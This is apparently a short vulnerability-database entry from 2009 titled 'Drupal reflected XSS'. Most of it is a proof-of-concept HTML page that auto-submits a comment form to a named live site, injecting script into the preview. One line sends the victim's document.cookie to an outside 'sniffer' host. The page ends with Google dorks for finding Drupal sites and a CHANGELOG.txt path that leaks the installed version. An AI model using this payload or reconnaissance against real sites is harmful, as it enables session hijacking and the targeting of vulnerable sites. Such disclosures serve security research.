Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21374
HistoryFeb 23, 2009 - 12:00 a.m.

Drupal reflected XSS

2009-02-2300:00:00
vulners.com
145

PoC:

<HTML>
<TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!–
Full HTML =on
"">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?&quot;+document.cookie;&lt;/script&gt;
–><BODY onload="p.submit()">
<form action="http://freelanguage.org/comment/reply/532/1263&quot;&lt;!--target--&gt; method="post" id="p">
<input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa">
<input type=hidden name="comment" value='"">><<script>alert(document.cookie)</script>'>
<input type=hidden name="format" value="3">
<input type=hidden name="form_id" value="comment_form">
<input type=hidden name="op" value='Preview comment'>
</form>
</BODY>
</HTML>

Google dork: powered by "drupal"
intitle:"powered by drupal"

Version Information Leakagee: http://Target/CHANGELOG.txt